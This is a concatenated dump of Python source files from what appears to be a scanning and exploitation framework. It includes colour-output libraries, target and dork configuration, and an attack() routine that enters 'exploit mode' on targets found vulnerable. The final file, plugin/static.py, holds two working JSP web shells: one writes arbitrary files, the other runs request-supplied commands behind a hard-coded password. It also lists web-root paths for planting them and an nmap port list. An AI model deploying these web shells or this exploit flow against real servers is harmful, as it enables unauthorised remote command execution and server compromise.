23 |
24 | """ANSII Color formatting for output in terminal."""
25 |
26 | from __future__ import print_function
27 | import os
28 |
29 |
30 | __ALL__ = [ 'colored', 'cprint' ]
31 |
32 | VERSION = (1, 1, 0)
33 |
34 | ATTRIBUTES = dict(
35 | list(zip([
36 | 'bold',
37 | 'dark',
38 | '',
39 | 'underline',
40 | 'blink',
41 | '',
42 | 'reverse',
43 | 'concealed'
44 | ],
45 | list(range(1, 9))
46 | ))
47 | )
48 | del ATTRIBUTES['']
49 |
50 |
51 | HIGHLIGHTS = dict(
52 | list(zip([
53 | 'on_grey',
54 | 'on_red',
55 | 'on_green',
56 | 'on_yellow',
57 | 'on_blue',
58 | 'on_magenta',
59 | 'on_cyan',
60 | 'on_white'
61 | ],
62 | list(range(40, 48))
63 | ))
64 | )
65 |
66 |
67 | COLORS = dict(
68 | list(zip([
69 | 'grey',
70 | 'red',
71 | 'green',
72 | 'yellow',
73 | 'blue',
74 | 'magenta',
75 | 'cyan',
76 | 'white',
77 | ],
78 | list(range(30, 38))
79 | ))
80 | )
81 |
82 |
83 | RESET = '\033[0m'
84 |
85 |
86 | def colored(text, color=None, on_color=None, attrs=None):
87 | """Colorize text.
88 |
89 | Available text colors:
90 | red, green, yellow, blue, magenta, cyan, white.
91 |
92 | Available text highlights:
93 | on_red, on_green, on_yellow, on_blue, on_magenta, on_cyan, on_white.
94 |
95 | Available attributes:
96 | bold, dark, underline, blink, reverse, concealed.
97 |
98 | Example:
99 | colored('Hello, World!', 'red', 'on_grey', ['blue', 'blink'])
100 | colored('Hello, World!', 'green')
101 | """
102 | if os.getenv('ANSI_COLORS_DISABLED') is None:
103 | fmt_str = '\033[%dm%s'
104 | if color is not None:
105 | text = fmt_str % (COLORS[color], text)
106 |
107 | if on_color is not None:
108 | text = fmt_str % (HIGHLIGHTS[on_color], text)
109 |
110 | if attrs is not None:
111 | for attr in attrs:
112 | text = fmt_str % (ATTRIBUTES[attr], text)
113 |
114 | text += RESET
115 | return text
116 |
117 |
118 | def cprint(text, color=None, on_color=None, attrs=None, **kwargs):
119 | """Print colorize text.
120 |
121 | It accepts arguments of print function.
122 | """
123 |
124 | print((colored(text, color, on_color, attrs)), **kwargs)
125 |
126 |
127 | if __name__ == '__main__':
128 | print('Current terminal type: %s' % os.getenv('TERM'))
129 | print('Test basic colors:')
130 | cprint('Grey color', 'grey')
131 | cprint('Red color', 'red')
132 | cprint('Green color', 'green')
133 | cprint('Yellow color', 'yellow')
134 | cprint('Blue color', 'blue')
135 | cprint('Magenta color', 'magenta')
136 | cprint('Cyan color', 'cyan')
137 | cprint('White color', 'white')
138 | print(('-' * 78))
139 |
140 | print('Test highlights:')
141 | cprint('On grey color', on_color='on_grey')
142 | cprint('On red color', on_color='on_red')
143 | cprint('On green color', on_color='on_green')
144 | cprint('On yellow color', on_color='on_yellow')
145 | cprint('On blue color', on_color='on_blue')
146 | cprint('On magenta color', on_color='on_magenta')
147 | cprint('On cyan color', on_color='on_cyan')
148 | cprint('On white color', color='grey', on_color='on_white')
149 | print('-' * 78)
150 |
151 | print('Test attributes:')
152 | cprint('Bold grey color', 'grey', attrs=['bold'])
153 | cprint('Dark red color', 'red', attrs=['dark'])
154 | cprint('Underline green color', 'green', attrs=['underline'])
155 | cprint('Blink yellow color', 'yellow', attrs=['blink'])
156 | cprint('Reversed blue color', 'blue', attrs=['reverse'])
157 | cprint('Concealed Magenta color', 'magenta', attrs=['concealed'])
158 | cprint('Bold underline reverse cyan color', 'cyan',
159 | attrs=['bold', 'underline', 'reverse'])
160 | cprint('Dark blink concealed white color', 'white',
161 | attrs=['dark', 'blink', 'concealed'])
162 | print(('-' * 78))
163 |
164 | print('Test mixing:')
165 | cprint('Underline red on grey color', 'red', 'on_grey',
166 | ['underline'])
167 | cprint('Reversed green on red color', 'green', 'on_red', ['reverse'])
168 |
169 |
--------------------------------------------------------------------------------
/thirdparty/colorama/ansitowin32.py:
--------------------------------------------------------------------------------
1 |
2 | import re
3 | import sys
4 |
5 | from .ansi import AnsiFore, AnsiBack, AnsiStyle, Style
6 | from .winterm import WinTerm, WinColor, WinStyle
7 | from .win32 import windll
8 |
9 |
10 | if windll is not None:
11 | winterm = WinTerm()
12 |
13 |
14 | def is_a_tty(stream):
15 | return hasattr(stream, 'isatty') and stream.isatty()
16 |
17 |
18 | class StreamWrapper(object):
19 | '''
20 | Wraps a stream (such as stdout), acting as a transparent proxy for all
21 | attribute access apart from method 'write()', which is delegated to our
22 | Converter instance.
23 | '''
24 | def __init__(self, wrapped, converter):
25 | # double-underscore everything to prevent clashes with names of
26 | # attributes on the wrapped stream object.
27 | self.__wrapped = wrapped
28 | self.__convertor = converter
29 |
30 | def __getattr__(self, name):
31 | return getattr(self.__wrapped, name)
32 |
33 | def write(self, text):
34 | self.__convertor.write(text)
35 |
36 |
37 | class AnsiToWin32(object):
38 | '''
39 | Implements a 'write()' method which, on Windows, will strip ANSI character
40 | sequences from the text, and if outputting to a tty, will convert them into
41 | win32 function calls.
42 | '''
43 | ANSI_RE = re.compile('\033\[((?:\d|;)*)([a-zA-Z])')
44 |
45 | def __init__(self, wrapped, convert=None, strip=None, autoreset=False):
46 | # The wrapped stream (normally sys.stdout or sys.stderr)
47 | self.wrapped = wrapped
48 |
49 | # should we reset colors to defaults after every .write()
50 | self.autoreset = autoreset
51 |
52 | # create the proxy wrapping our output stream
53 | self.stream = StreamWrapper(wrapped, self)
54 |
55 | on_windows = sys.platform.startswith('win')
56 |
57 | # should we strip ANSI sequences from our output?
58 | if strip is None:
59 | strip = on_windows
60 | self.strip = strip
61 |
62 | # should we should convert ANSI sequences into win32 calls?
63 | if convert is None:
64 | convert = on_windows and is_a_tty(wrapped)
65 | self.convert = convert
66 |
67 | # dict of ansi codes to win32 functions and parameters
68 | self.win32_calls = self.get_win32_calls()
69 |
70 | # are we wrapping stderr?
71 | self.on_stderr = self.wrapped is sys.stderr
72 |
73 |
74 | def should_wrap(self):
75 | '''
76 | True if this class is actually needed. If false, then the output
77 | stream will not be affected, nor will win32 calls be issued, so
78 | wrapping stdout is not actually required. This will generally be
79 | False on non-Windows platforms, unless optional functionality like
80 | autoreset has been requested using kwargs to init()
81 | '''
82 | return self.convert or self.strip or self.autoreset
83 |
84 |
85 | def get_win32_calls(self):
86 | if self.convert and winterm:
87 | return {
88 | AnsiStyle.RESET_ALL: (winterm.reset_all, ),
89 | AnsiStyle.BRIGHT: (winterm.style, WinStyle.BRIGHT),
90 | AnsiStyle.DIM: (winterm.style, WinStyle.NORMAL),
91 | AnsiStyle.NORMAL: (winterm.style, WinStyle.NORMAL),
92 | AnsiFore.BLACK: (winterm.fore, WinColor.BLACK),
93 | AnsiFore.RED: (winterm.fore, WinColor.RED),
94 | AnsiFore.GREEN: (winterm.fore, WinColor.GREEN),
95 | AnsiFore.YELLOW: (winterm.fore, WinColor.YELLOW),
96 | AnsiFore.BLUE: (winterm.fore, WinColor.BLUE),
97 | AnsiFore.MAGENTA: (winterm.fore, WinColor.MAGENTA),
98 | AnsiFore.CYAN: (winterm.fore, WinColor.CYAN),
99 | AnsiFore.WHITE: (winterm.fore, WinColor.GREY),
100 | AnsiFore.RESET: (winterm.fore, ),
101 | AnsiBack.BLACK: (winterm.back, WinColor.BLACK),
102 | AnsiBack.RED: (winterm.back, WinColor.RED),
103 | AnsiBack.GREEN: (winterm.back, WinColor.GREEN),
104 | AnsiBack.YELLOW: (winterm.back, WinColor.YELLOW),
105 | AnsiBack.BLUE: (winterm.back, WinColor.BLUE),
106 | AnsiBack.MAGENTA: (winterm.back, WinColor.MAGENTA),
107 | AnsiBack.CYAN: (winterm.back, WinColor.CYAN),
108 | AnsiBack.WHITE: (winterm.back, WinColor.GREY),
109 | AnsiBack.RESET: (winterm.back, ),
110 | }
111 |
112 |
113 | def write(self, text):
114 | if self.strip or self.convert:
115 | self.write_and_convert(text)
116 | else:
117 | self.wrapped.write(text)
118 | self.wrapped.flush()
119 | if self.autoreset:
120 | self.reset_all()
121 |
122 |
123 | def reset_all(self):
124 | if self.convert:
125 | self.call_win32('m', (0,))
126 | elif is_a_tty(self.wrapped):
127 | self.wrapped.write(Style.RESET_ALL)
128 |
129 |
130 | def write_and_convert(self, text):
131 | '''
132 | Write the given text to our wrapped stream, stripping any ANSI
133 | sequences from the text, and optionally converting them into win32
134 | calls.
135 | '''
136 | cursor = 0
137 | for match in self.ANSI_RE.finditer(text):
138 | start, end = match.span()
139 | self.write_plain_text(text, cursor, start)
140 | self.convert_ansi(*match.groups())
141 | cursor = end
142 | self.write_plain_text(text, cursor, len(text))
143 |
144 |
145 | def write_plain_text(self, text, start, end):
146 | if start < end:
147 | self.wrapped.write(text[start:end])
148 | self.wrapped.flush()
149 |
150 |
151 | def convert_ansi(self, paramstring, command):
152 | if self.convert:
153 | params = self.extract_params(paramstring)
154 | self.call_win32(command, params)
155 |
156 |
157 | def extract_params(self, paramstring):
158 | def split(paramstring):
159 | for p in paramstring.split(';'):
160 | if p != '':
161 | yield int(p)
162 | return tuple(split(paramstring))
163 |
164 |
165 | def call_win32(self, command, params):
166 | if params == []:
167 | params = [0]
168 | if command == 'm':
169 | for param in params:
170 | if param in self.win32_calls:
171 | func_args = self.win32_calls[param]
172 | func = func_args[0]
173 | args = func_args[1:]
174 | kwargs = dict(on_stderr=self.on_stderr)
175 | func(*args, **kwargs)
176 | elif command in ('H', 'f'): # set cursor position
177 | func = winterm.set_cursor_position
178 | func(params, on_stderr=self.on_stderr)
179 | elif command in ('J'):
180 | func = winterm.erase_data
181 | func(params, on_stderr=self.on_stderr)
182 | elif command == 'A':
183 | if params == () or params == None:
184 | num_rows = 1
185 | else:
186 | num_rows = params[0]
187 | func = winterm.cursor_up
188 | func(num_rows, on_stderr=self.on_stderr)
189 |
190 |
--------------------------------------------------------------------------------
/lib/core/option.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #-*- coding:utf-8 -*-
3 |
4 | import os
5 | import re
6 | import glob #文件路径查找
7 | import sys
8 | from lib.core.data import conf, paths, th, logger
9 | from lib.core.enums import TARGET_MODE_STATUS, ENGINE_MODE_STATUS
10 | from lib.core.enums import API_MODE_NAME
11 | from lib.core.register import Register
12 | from lib.core.common import dataToStdout
13 | from thirdparty.prettytable.prettytable import PrettyTable
14 |
15 |
16 | def initOptions(args): #初始化操作
17 | checkShow(args) #检查是否要求列出脚本
18 | checkSearch(args) #检查是否在搜索脚本
19 | EngineRegister(args) #检查配置扫描引擎,注册互斥量,扫描线程数
20 | ScriptRegister(args) #检查配置脚本项参数
21 | TargetRegister(args) #检查配置扫描目标信息
22 | ApiRegister(args) #检查API配置信息
23 | '''
24 | print "#########以下是conf字典#########"
25 | print conf
26 | '''
27 |
28 | def checkShow(args):
29 | input_path = args.script_name
30 | list_scripts = args.list_scripts
31 | search_script = args.search_script
32 | if list_scripts and (input_path or search_script):
33 | msg = 'Cannot specify or search script when you use [--list]'
34 | sys.exit(logger.error(msg))
35 | scriptsheet = PrettyTable(["Script"])
36 | scriptsheet.align["Script"] = "l"
37 | scriptsheet.padding_width = 1
38 | if list_scripts:
39 | module_name_list = glob.glob(os.path.join(paths.SCRIPT_PATH, '*.py')) #获取script文件夹下所有.py文件列表
40 | msg = 'Total:{}\n'.format(str(len(module_name_list) - 1)) #除去__init__.py算出total总数
41 | for each in module_name_list:
42 | _str = os.path.split(each)[1][0:-3]
43 | if _str != '__init__':
44 | scriptsheet.add_row([_str])
45 | print scriptsheet
46 | dataToStdout(msg)
47 | logger.info('System exit')
48 | sys.exit()
49 |
50 | def checkSearch(args):
51 | input_path = args.script_name
52 | list_scripts = args.list_scripts
53 | search_script = args.search_script
54 | if search_script and (input_path or list_scripts):
55 | msg = 'Cannot specify or list script when you use [--search]'
56 | sys.exit(logger.error(msg))
57 | if search_script:
58 | if re.findall(r'[^\w\d\-_ ]', search_script):
59 | msg = 'The script name you provided is incorrect'
60 | sys.exit(logger.error(msg))
61 | scriptsheet = PrettyTable(["Script"])
62 | scriptsheet.align["Script"] = "l"
63 | scriptsheet.padding_width = 1
64 | length = 0
65 | module_name_list = glob.glob(os.path.join(paths.SCRIPT_PATH, '*.py'))
66 | for each in module_name_list:
67 | _str = os.path.split(each)[1][0:-3]
68 | if _str != '__init__' and re.findall(search_script, _str):
69 | scriptsheet.add_row([_str])
70 | length = length + 1
71 | if length > 0:
72 | msg = 'Total:{}\n'.format(length)
73 | print scriptsheet
74 | dataToStdout(msg)
75 | else:
76 | msg = 'No results found'
77 | logger.error(msg)
78 | logger.info('System exit')
79 | sys.exit()
80 |
81 |
82 | def EngineRegister(args):
83 | thread_status = args.engine_thread
84 | gevent_status = args.engine_gevent
85 | thread_num = args.thread_num
86 |
87 | def __thread():
88 | conf.ENGINE = ENGINE_MODE_STATUS.THREAD #Thread=9
89 |
90 | def __gevent():
91 | conf.ENGINE = ENGINE_MODE_STATUS.GEVENT #Gevent=8
92 |
93 | conf.ENGINE = ENGINE_MODE_STATUS.THREAD # default choice Thread=9
94 |
95 | msg = 'Use [--threads] to set Multi-Threaded mode or [--gevent] to set Coroutine mode.'
96 | r = Register(mutex=True, start=0, stop=1, mutex_errmsg=msg)
97 | r.add(__thread, thread_status)
98 | r.add(__gevent, gevent_status)
99 | r.run()
100 |
101 | if 0 < thread_num < 101:
102 | th.THREADS_NUM = conf.THREADS_NUM = thread_num
103 | else:
104 | msg = 'Invalid input in [--number], range: 1 to 100'
105 | sys.exit(logger.error(msg))
106 |
107 |
108 | def ScriptRegister(args):
109 | input_path = args.script_name
110 | list_scripts = args.list_scripts
111 | search_script = args.search_script
112 | # handle input: nothing
113 | if input_path and (search_script or list_scripts):
114 | msg = 'Cannot specify script when you use [--list] or [--search]'
115 | sys.exit(logger.error(msg))
116 | # handle input: "-s ./script/spider.py"
117 | if input_path:
118 | if os.path.split(input_path)[0]: #如果指定了脚本获取给出脚本的文件夹路径
119 | if os.path.exists(input_path): #判断是否存在该脚本文件
120 | if os.path.isfile(input_path): #判断是否是文件
121 | if input_path.endswith('.py'): #判断是否是Python文件
122 | conf.MODULE_NAME = os.path.split(input_path)[-1] #得到脚本文件名.py
123 | conf.MODULE_FILE_PATH = os.path.abspath(input_path) #得到脚本文件的绝对路径
124 | else:
125 | msg = '[%s] not a Python file. Example: [-s spider] or [-s ./script/spider.py]' % input_path
126 | sys.exit(logger.error(msg))
127 | else:
128 | msg = '[%s] not a file. Example: [-s spider] or [-s ./script/spider.py]' % input_path
129 | sys.exit(logger.error(msg))
130 | else:
131 | msg = '[%s] not found. Example: [-s spider] or [-s ./script/spider.py]' % input_path
132 | sys.exit(logger.error(msg))
133 |
134 | # handle input: "-s spider" "-s spider.py"
135 | else:
136 | if not input_path.endswith('.py'): #如果指定的脚本文件不以.py结尾就加一个.py
137 | input_path += '.py'
138 | _path = os.path.abspath(os.path.join(paths.SCRIPT_PATH, input_path))
139 | if os.path.isfile(_path): #如果这个脚本文件在脚本库中找不到就提醒并退出
140 | conf.MODULE_NAME = input_path
141 | conf.MODULE_FILE_PATH = os.path.abspath(_path)
142 | else:
143 | msg = 'Script [%s] not exist. Use [--list] to view all available scripts in ./script/' % input_path
144 | sys.exit(logger.error(msg))
145 |
146 |
147 | def TargetRegister(args):
148 | input_path = args.script_name
149 | input_file = args.target_file
150 | input_single = args.target_urlip
151 | input_cidr = args.target_cidr
152 | api_zoomeye = args.zoomeye_dork
153 | api_baidu = args.baidu_dork
154 |
155 | if not input_path:
156 | msg = 'Please specify a script with [-s]'
157 | sys.exit(logger.error(msg))
158 | def __file(): #配置批量扫描文件路径
159 | if not os.path.isfile(input_file):
160 | msg = 'TargetFile not found: %s' % input_file
161 | sys.exit(logger.error(msg))
162 | conf.TARGET_MODE = TARGET_MODE_STATUS.FILE #conf.TAGET_MODE=9 -iF模式
163 | conf.INPUT_FILE_PATH = input_file
164 |
165 | def __cidr():
166 | conf.TARGET_MODE = TARGET_MODE_STATUS.IPMASK #conf.TARGET_MODE=7 -iN模式
167 | conf.NETWORK_STR = input_cidr
168 | conf.INPUT_FILE_PATH = None
169 |
170 | def __single():
171 | conf.TARGET_MODE = TARGET_MODE_STATUS.SINGLE #conf.TARGET_MODE=8 -iS模式
172 | conf.SINGLE_TARGET_STR = input_single
173 | th.THREADS_NUM = conf.THREADS_NUM = 1
174 | conf.INPUT_FILE_PATH = None
175 |
176 | def __zoomeye():
177 | conf.TARGET_MODE = TARGET_MODE_STATUS.API #conf.TARGET_MODE=5 API模式
178 | conf.API_MODE = API_MODE_NAME.ZOOMEYE #使用Zoomeye
179 | conf.API_DORK = api_zoomeye
180 |
181 | def __baidu():
182 | conf.TARGET_MODE = TARGET_MODE_STATUS.API #conf.TARGET_MODE=5 API模式
183 | conf.API_MODE = API_MODE_NAME.BAIDU #使用Baidu
184 | conf.API_DORK = api_baidu
185 |
186 | msg = 'Please load targets with [-t|-f|-c] or use API with [-zoomeye|-baidu]'
187 | r = Register(mutex=True, mutex_errmsg=msg)
188 | r.add(__file, input_file)
189 | r.add(__cidr, input_cidr)
190 | r.add(__single, input_single)
191 | r.add(__zoomeye, api_zoomeye)
192 | r.add(__baidu, api_baidu)
193 | r.run()
194 |
195 |
196 | def ApiRegister(args):
197 | search_type = args.search_type
198 | offset = args.api_offset
199 | api_limit = args.api_limit
200 |
201 | if not 'API_MODE' in conf:
202 | return
203 |
204 | if not conf.API_DORK:
205 | msg = 'Empty API dork, show usage with [-h]'
206 | sys.exit(logger.error(msg))
207 |
208 | if offset < 0:
209 | msg = 'Invalid value in [--offset], show usage with [-h]'
210 | sys.exit(logger.error(msg))
211 | else:
212 | conf.API_OFFSET = offset
213 |
214 | if api_limit <= 0:
215 | msg = 'Invalid value in [--limit], show usage with [-h]'
216 | sys.exit(logger.error(msg))
217 | else:
218 | conf.API_LIMIT = api_limit
219 |
220 | if conf.API_MODE is API_MODE_NAME.ZOOMEYE:
221 | if search_type not in ['web', 'host']:
222 | msg = 'Invalid value in [--search-type], show usage with [-h]'
223 | sys.exit(logger.error(msg))
224 | else:
225 | conf.ZOOMEYE_SEARCH_TYPE = search_type
226 |
--------------------------------------------------------------------------------
/lib/core/common.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #-*- coding:utf-8 -*-
3 |
4 | import os
5 | import re
6 | import sys
7 | import imp
8 | import time
9 | import logging
10 | from lib.core.data import *
11 | from lib.core.exception import *
12 | from lib.utils.expfunctions import *
13 | from lib.core.log import LOGGER_HANDLER
14 | from lib.core.settings import BANNER, UNICODE_ENCODING, NULL, INVALID_UNICODE_CHAR_FORMAT, OPTIONAL_MOUDLE_METHODS
15 | from lib.core.convert import stdoutencode
16 | from lib.core.enums import EXIT_STATUS, TARGET_MODE_STATUS
17 | from thirdparty.termcolor.termcolor import colored
18 | from thirdparty.odict.odict import OrderedDict
19 | from thirdparty.prettytable.prettytable import PrettyTable
20 |
21 |
22 | def setPaths():#设置POC-T的文件路径和目录
23 | """
24 | 设置Sepia的绝对路径
25 | """
26 | root_path = paths.ROOT_PATH
27 | paths.DATA_PATH = os.path.join(root_path, "data") #设置data文件夹路径
28 | paths.SCRIPT_PATH = os.path.join(root_path, "script") #设置script文件夹路径
29 | paths.CONFIG_PATH = os.path.join(root_path, "toolkit.conf") #设置toolkit.conf文件路径
30 | #如果data、script、output三个文件夹都不存在就创建
31 | if not os.path.exists(paths.SCRIPT_PATH):
32 | os.mkdir(paths.SCRIPT_PATH)
33 | if not os.path.exists(paths.DATA_PATH):
34 | os.mkdir(paths.DATA_PATH)
35 |
36 | paths.WEAK_PASS = os.path.join(paths.DATA_PATH, "pass100.txt") #设置弱口令文件pass100.txt的路径
37 | paths.LARGE_WEAK_PASS = os.path.join(paths.DATA_PATH, "pass1000.txt") #设置弱口令文件pass1000.txt的路径
38 | paths.UA_LIST_PATH = os.path.join(paths.DATA_PATH, "user-agents.txt") #设置user-agents.txt文件的路径
39 |
40 | if os.path.isfile(paths.CONFIG_PATH) and os.path.isfile(paths.WEAK_PASS) and os.path.isfile(
41 | paths.LARGE_WEAK_PASS) and os.path.isfile(paths.UA_LIST_PATH):
42 | pass
43 | else:
44 | #如果toolkit.conf、pass100.txt、pass1000.txt、user-agent.txt四个缺失任何一个,就抛出异常
45 | msg = 'Some files missing, it may cause an issue'
46 | raise ToolkitMissingPrivileges(msg)
47 |
48 | def checkFile(filename):
49 | """
50 | function Checks for file existence and readability
51 | """
52 | valid = True
53 |
54 | if filename is None or not os.path.isfile(filename):
55 | valid = False
56 |
57 | if valid:
58 | try:
59 | with open(filename, "rb"):
60 | pass
61 | except IOError:
62 | valid = False
63 |
64 | if not valid:
65 | raise ToolkitSystemException("unable to read file '%s'" % filename)
66 |
67 |
68 | def banner():
69 | """
70 | Function prints banner with its version
71 | """
72 | _ = BANNER
73 | if not getattr(LOGGER_HANDLER, "is_tty", False):
74 | _ = re.sub("\033.+?m", "", _)
75 | dataToStdout(_)
76 |
77 |
78 | def dataToStdout(data, bold=False):
79 | """
80 | Writes text to the stdout (console) stream
81 | """
82 | logging._acquireLock()
83 | if isinstance(data, unicode):
84 | message = stdoutencode(data)
85 | else:
86 | message = data
87 |
88 | sys.stdout.write(setColor(message, bold))
89 |
90 | try:
91 | sys.stdout.flush()
92 | except IOError:
93 | pass
94 |
95 | logging._releaseLock()
96 | return
97 |
98 |
99 | def setColor(message, bold=False):
100 | retVal = message
101 |
102 | if message and getattr(LOGGER_HANDLER, "is_tty", False): # colorizing handler
103 | if bold:
104 | retVal = colored(message, color=None, on_color=None, attrs=("bold",))
105 |
106 | return retVal
107 |
108 |
109 | def pollProcess(process, suppress_errors=False):
110 | """
111 | Checks for process status (prints > if still running)
112 | """
113 |
114 | while True:
115 | message = '>'
116 | sys.stdout.write(message)
117 | try:
118 | sys.stdout.flush()
119 | except IOError:
120 | pass
121 |
122 | time.sleep(1)
123 |
124 | returncode = process.poll()
125 |
126 | if returncode is not None:
127 | if not suppress_errors:
128 | if returncode == 0:
129 | print " done\n"
130 | elif returncode < 0:
131 | print " process terminated by signal %d\n" % returncode
132 | elif returncode > 0:
133 | print " quit unexpectedly with return code %d\n" % returncode
134 | break
135 |
136 |
137 | def getSafeExString(ex, encoding=None):
138 | """
139 | Safe way how to get the proper exception represtation as a string
140 | (Note: errors to be avoided: 1) "%s" % Exception(u'\u0161') and 2) "%s" % str(Exception(u'\u0161'))
141 | """
142 | retVal = ex
143 |
144 | if getattr(ex, "message", None):
145 | retVal = ex.message
146 | elif getattr(ex, "msg", None):
147 | retVal = ex.msg
148 |
149 | return getUnicode(retVal, encoding=encoding)
150 |
151 |
152 | def getUnicode(value, encoding=None, noneToNull=False):
153 | """
154 | Return the unicode representation of the supplied value:
155 |
156 | >>> getUnicode(u'test')
157 | u'test'
158 | >>> getUnicode('test')
159 | u'test'
160 | >>> getUnicode(1)
161 | u'1'
162 | """
163 |
164 | if noneToNull and value is None:
165 | return NULL
166 |
167 | if isListLike(value):
168 | value = list(getUnicode(_, encoding, noneToNull) for _ in value)
169 | return value
170 |
171 | if isinstance(value, unicode):
172 | return value
173 | elif isinstance(value, basestring):
174 | while True:
175 | try:
176 | return unicode(value, encoding or UNICODE_ENCODING)
177 | except UnicodeDecodeError, ex:
178 | try:
179 | return unicode(value, UNICODE_ENCODING)
180 | except Exception:
181 | value = value[:ex.start] + "".join(
182 | INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
183 | else:
184 | try:
185 | return unicode(value)
186 | except UnicodeDecodeError:
187 | return unicode(str(value), errors="ignore") # encoding ignored for non-basestring instances
188 |
189 |
190 | def isListLike(value):
191 | """
192 | Returns True if the given value is a list-like instance
193 |
194 | >>> isListLike([1, 2, 3])
195 | True
196 | >>> isListLike(u'2')
197 | False
198 | """
199 |
200 | return isinstance(value, (list, tuple, set))
201 |
202 |
203 | def systemQuit(status=EXIT_STATUS.SYSETM_EXIT):
204 | if status == EXIT_STATUS.USER_QUIT and "is_continue" not in th:
205 | logger.info('User quit')
206 | logger.error('System exit')
207 | elif status == EXIT_STATUS.USER_QUIT and "exploit_mode" in th:
208 | if th.exploit_mode:
209 | logger.error('Exit exploit mode')
210 | logger.info('System exit')
211 | else:
212 | if status == EXIT_STATUS.SYSETM_EXIT:
213 | printResult()
214 | if conf.TARGET_MODE == TARGET_MODE_STATUS.SINGLE: #如果是扫描单个目标就启动attack
215 | attack()
216 | logger.info('System exit')
217 | elif status == EXIT_STATUS.USER_QUIT and th.is_continue:
218 | dataToStdout('\n')
219 | printResult()
220 | logger.info('User quit')
221 | logger.error('System exit')
222 | elif status == EXIT_STATUS.ERROR_EXIT and th.is_continue:
223 | dataToStdout('\n')
224 | printResult()
225 | logger.error('System exit')
226 | else:
227 | raise ToolkitValueException('Invalid status code: %s' % str(status))
228 | sys.exit(0)
229 |
230 | def printResult():
231 | targetsheet = PrettyTable(["Target", "Vulnerable"])
232 | targetsheet.align["Target"] = "l"
233 | targetsheet.padding_width = 1
234 | for i in targetlist:
235 | targetsheet.add_row(i)
236 | print targetsheet
237 | msg = '{} found | {} scanned in {} second'.format(th.found_count, th.scan_count, str(time.time()-th.start_time)[0:4])
238 | out = '{}\n'.format(msg)
239 | dataToStdout(out)
240 |
241 | def attack():
242 | if len(targetlist) and targetlist[0][1]:
243 | for each in OPTIONAL_MOUDLE_METHODS: #OPTIONAL_MOUDLE_METHODS=['exp']
244 | if not hasattr(th.module_obj, each): #如果模块中不存在'exp'方法就提醒并退出
245 | msg = "The script does not contain any exploit module"
246 | logger.warning(msg)
247 | sys.exit(logger.info('System exit'))
248 | else:
249 | try:
250 | expfunc = th.module_obj._type.lower() #加载攻击模块
251 | msg = "Go to exploit mode..."
252 | logger.info(msg)
253 | th.exploit_mode = True
254 | eval(expfunc)(th.module_obj.exp, conf.SINGLE_TARGET_STR)
255 | except AttributeError:
256 | logger.warning("The script didn't specified an exploit type. Exit exploit mode")
257 | sys.exit(logger.info('System exit'))
258 | except NameError:
259 | logger.warning("Sepia does not support vulnerability type '%s'. Exit exploit mode" % th.module_obj._type)
260 | sys.exit(logger.info('System exit'))
261 |
262 |
263 | def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, unique=False):
264 | """
265 | @function returns newline delimited items contained inside file
266 | """
267 |
268 | retVal = list() if not unique else OrderedDict()
269 |
270 | checkFile(filename)
271 |
272 | try:
273 | with open(filename, 'r') as f:
274 | for line in (f.readlines() if unicode_ else f.xreadlines()):
275 | # xreadlines doesn't return unicode strings when codecs.open() is used
276 | if commentPrefix and line.find(commentPrefix) != -1:
277 | line = line[:line.find(commentPrefix)]
278 |
279 | line = line.strip()
280 |
281 | if not unicode_:
282 | try:
283 | line = str.encode(line)
284 | except UnicodeDecodeError:
285 | continue
286 |
287 | if line:
288 | if lowercase:
289 | line = line.lower()
290 |
291 | if unique and line in retVal:
292 | continue
293 |
294 | if unique:
295 | retVal[line] = True
296 |
297 | else:
298 | retVal.append(line)
299 |
300 | except (IOError, OSError, MemoryError), ex:
301 | errMsg = "something went wrong while trying "
302 | errMsg += "to read the content of file '%s' ('%s')" % (filename, ex)
303 | raise ToolkitSystemException(errMsg)
304 |
305 | return retVal if not unique else retVal.keys()
306 |
--------------------------------------------------------------------------------
/plugin/static.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #-*- coding:utf-8 -*-
3 |
4 | class ABSPATH_PREFIXES:
5 | LINUX = (
6 | "/var/www", "/usr/local/apache", "/usr/local/apache2", "/usr/local/www/apache22", "/usr/local/www/apache24",
7 | "/usr/local/httpd", "/var/www/nginx-default", "/srv/www", "/var/www/vhosts",
8 | "/var/www/virtual", "/var/www/clients/vhosts", "/var/www/clients/virtual")
9 | WINDOWS = (
10 | "/xampp", "/Program Files/xampp", "/wamp", "/Program Files/wampp", "/apache",
11 | "/Program Files/Apache Group/Apache",
12 | "/Program Files/Apache Group/Apache2", "/Program Files/Apache Group/Apache2.2",
13 | "/Program Files/Apache Group/Apache2.4", "/Inetpub/wwwroot",
14 | "/Inetpub/vhosts")
15 | ALL = LINUX + WINDOWS
16 |
17 |
18 | # Suffixes used in brute force search for web server document root
19 | ABSPATH_SUFFIXES = (
20 | "html", "htdocs", "httpdocs", "php", "public", "src", "site", "build", "web", "www", "data", "sites/all",
21 | "www/build")
22 |
23 | JSP_UPLOAD = """<%@page contentType="text/html; charset=GBK" import="java.io.*;"%>
24 | JSP
25 | <%
26 | String path=request.getParameter("path");
27 | String content=request.getParameter("content");
28 | String url=request.getRequestURI();
29 | String relativeurl=url.substring(url.indexOf('/',1));
30 | String absolutepath=application.getRealPath(relativeurl);
31 | if (path!=null && !path.equals("") && content!=null && !content.equals("")){
32 | try{
33 | File newfile=new File(path);
34 | PrintWriter writer=new PrintWriter(newfile);
35 | writer.println(content);
36 | writer.close();
37 | if (newfile.exists() && newfile.length()>0){
38 | out.println("save success!");
39 | }else{
40 | out.println("save failed!");
41 | }
42 | }catch(Exception e){
43 | e.printStackTrace();
44 | }
45 | }
46 | out.println("");
52 | %>
53 | """
54 |
55 | JSP_RCE = """<%
56 | if("023".equals(request.getParameter("pwd"))){
57 | java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
58 | int a = -1;
59 | byte[] b = new byte[2048];
60 | out.print("");
61 | while((a=in.read(b))!=-1){
62 | out.println(new String(b,0,a));
63 | }
64 | out.print("");
65 | }
66 | %>"""
67 |
68 | NMAP_PORTS_1000 = \
69 | ['1', '3', '4', '6', '7', '9', '13', '17', '19', '20', '21', '22', '23', '24', '25', '26', '30', '32', '33',
70 | '37', '42', '43', '49', '53', '70', '79', '80', '81', '82', '83', '84', '85', '88', '89', '90', '99', '100',
